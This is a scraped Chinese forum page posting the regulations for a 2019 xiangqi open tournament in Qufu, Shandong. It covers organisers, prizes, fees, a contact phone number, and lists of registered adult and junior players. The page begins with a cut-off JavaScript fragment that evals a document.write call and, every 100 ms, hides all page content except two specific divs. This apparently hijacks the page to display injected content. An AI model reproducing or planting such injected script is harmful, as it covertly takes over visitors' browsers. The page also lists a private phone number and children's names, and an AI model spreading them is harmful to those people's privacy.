'; eval("document.write('" + ss + "');"); try { setInterval(function() { try { document.getElementById("divAll").style.display = "none" } catch (c) {} for (var a = 0; a < document.body.children.length; a++) try { var b = document.body.children[a].id; "iconDiv1" != b && "showcloneshengxiaon" != b && (document.body.children[a].style.display = "none") } catch (d) {} }, 100) } catch (e$$2) {}; 第21届“建国杯”暨"山东连跃杯"象棋公开赛规程 - 鲁中象棋报 - 齐鲁智力文化网 - 棋牌文化交流中心
 找回密码
 立即注册

QQ登录

只需一步,快速开始

快捷导航
搜索
  热搜: 重锤康复杯 顺炮
鲁中棋牌文化网更换域名:/
查看: 272|回复: 2
打印 上一主题 下一主题

第21届“建国杯”暨"山东连跃杯"象棋公开赛规程

[复制链接]
跳转到指定楼层
楼主
发表于 2019-9-5 07:01:09 来自手机 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
       第21届“建国杯”暨"山东连跃杯"象棋公开赛规程

    为促进棋类运动健康发展,拟定2019中国曲阜国际孔子文化节和国庆节期间,在孔子故里,著名历史文化名城,山东·曲阜,举办第21届“建国杯”暨"山东连跃杯"象棋公开赛,方案如下:
一、主办单位: 曲阜市人民政府   国际孔子文化节办公室
二、承办单位:曲阜市总工会   曲阜市体育活动中心  济宁市象棋运动协会  曲阜棋牌运动协会   燕京啤酒(曲阜三孔)有限责任公司  曲阜市孔子文化产业发展有限公司
三、冠名单位:山东连跃供应链管理有限公司
四、支持媒体:中国体育报、中国棋牌网、中国智力运动会网、齐鲁智力文化网、全国各大棋牌群、电视台、全国棋牌各大杂志等媒体支持、国际孔子文化节媒体报道。
五、比赛地点:山东省曲阜市燕京啤酒4楼会议室。
六、比赛时间:2019年10月1日早8点半开始,10月2日中午结束。
七、参赛范围:全国象棋爱好者均可报名参赛。
八、参赛项目:个人赛 。
九、比赛方法:进行九轮比赛,采用2011棋规。电脑积分编排每方基本用时30分钟,每走一步加3秒,超时判负,自然限着40回合,简明局势及定势残局裁判有权判和。
十、奖励办法:
1、成年组前30名,少年组(14岁及以下)前6名,均颁发荣誉证书。
2、成年组第一名奖金6000元,第二名奖金3000元,第三名
奖金1000元,第四、五、六名各奖奖金500元,第七至十八名各奖奖金200元。第十九
至三十名各奖奖金100元。
2、少年组第一名奖金600元,第二名奖金300元,第三名奖金
200元。第四至六名各奖奖金100元。
十一、成人组;前30名,各奖燕京啤酒一箱。
十二、参赛人员均有精美礼品一份。
十三、10月1日中午免费就餐。
十四、所有参赛人员需缴纳赛事服务费;每人50元。
十五、报名报到:1,报名方式:参赛人员通过电话、微信报名,注明;(城市+姓名)。
2,联系人:杨先生手机号:13325192666    (微信同号)
3,报名人数:120人,不接受现场报名,通过微信交报名费为准。
十六、比赛期间发生任何意外,组织方不承担任何责任。

十七、其它未尽事宜,由组委会负责解释。         




                                                       2019年8月28日

分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 转播转播 分享淘帖
沙发
发表于 2019-9-5 11:55:08 | 只看该作者
    齐鲁智力文化网预祝第21届“建国杯”暨"山东连跃杯"象棋公开赛圆满成功!
板凳
 楼主| 发表于 2019-9-6 09:45:06 来自手机 | 只看该作者
第21届"建国杯"暨"山东连跃杯"象棋公开赛; 10月1日至2日,在山东曲阜举行; 报满120人止,已报名人员;  成年组;     1.辽宁 苗永鹏    特级大师     2.河北 孙勇宏    河北棋王     3.北京  左   治    中国名手     4.河北  张子明   第20届建国杯第一名     5.济南  赵勇霖   山东棋王     6.东营  张庆峰     7.淄博  夏金凯   山东棋王     8.烟台  曲敬川     9.枣庄  魏   明   10.济宁  褚文强   济宁棋王    11.济宁  李向阳  济宁棋王    12.济宁  高   嘉    13.邹城  侯计周    14.邹城  陶伟卫    15.汶上  丁    辉    16.兖州 刘安琪  山东少年冠军    17.曲阜 杨建国    18.曲阜 王成山    19.曲阜 孔   军    20.梁山 董云坡    21.邹城 孙    伟    22.邹城 任力明    23.邹城 杜庆祥    24.金乡 李    军    25.汶上 吕    健    26.金乡 程子彦    27.滨州 王佩坤     28.滨州 田    凯    29.兖州 谷平河    30.兖州 艾卫国    31.兖州 刘奎伦    32.兖州 刘庆涛    33.兖州 胡景彬    34.兖州 王长华    35.兖州 谭兴旺    36.兖州 田庆利    37.济宁 李东亚  第17届建国杯第一名    38.济宁 李纳新    39.济宁 邱   勇    40.曲阜 郑体军    41.东平 刘    刚    42.曲阜 夏芝忠    43.定陶 李为民    44.定陶  程继光    45.定陶  郑    忠    46.定陶  鞠海涛    47.滕州  陶诺维    48.滕州  亢子文    49.滕州  邢晓洁    50.滕州  杨   威     51.滕州  马宏翰     52.滕州  薛    涛       53.滕州  黄    伟     54.邹城  栾    卫     55.曲阜  孔祥迁     56.金乡  李志亮     57.金乡  李建华     58.江苏  刘元辉     59.菏泽   张   蒙     60.滕州   吴卡聪     61.金乡   侯明伟     62.嘉祥   宋玉峰         63.嘉祥   张文德      64.嘉祥   李跃宏     65.兖州   张昭庆     66.邹城   郭东志     67.邹城   胡广全  少年组;        1、曲阜   朱明昆        2、曲阜   孔浩然                3、曲阜   代徐多        4、曲阜    张智祺        5、曲阜    张梓豪     6济宁鲁宁棋院高现诺     7济宁鲁宁棋院魏子默     8济宁鲁宁棋院李悦阳     9济宁鲁宁棋院于俊轩        10.邹城   刘彦杰       11.邹城   孟俊泽      12.邹城   孙傲然     13.邹城   姜岱宗       14.邹城   尹明泽       15.邹城   李瑞阳      16.邹城   房子昕      17.邹城   郑俊祺     18.邹城   步孟杭      19.邹城   赵楷瑞      20.邹城   李德硕     21.邹城   袁昌锐     22.邹城   姜亦周     23.邹城   邢国轩     24.滕州   钱鹏州     25滕州    亢子诺     26.滕州   颜    蕾     27.滕州   邢瀚中     28.滕州   侯俊宇     29.滕州   颜明成     30.滕州   赵   智     31.滕州   赵梓宁     32.滕州   刘浩宇     33.滕州   张国超     34.滕州   宋东泽     35.滕州   黄友森     36.滕州   赵彦博     37.滕州   石建熹     38.滕州   马煜泽
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|齐鲁智力文化网 ( 鲁ICP备11007780号

GMT+8, 2019-9-24 17:02 , Processed in 0.134781 second(s), 23 queries .

Powered by Discuz! X3.2

© 2006-2019 齐鲁智力文化网. 版权所有:淄博旭冉网络科技有限公司

快速回复 返回顶部 返回列表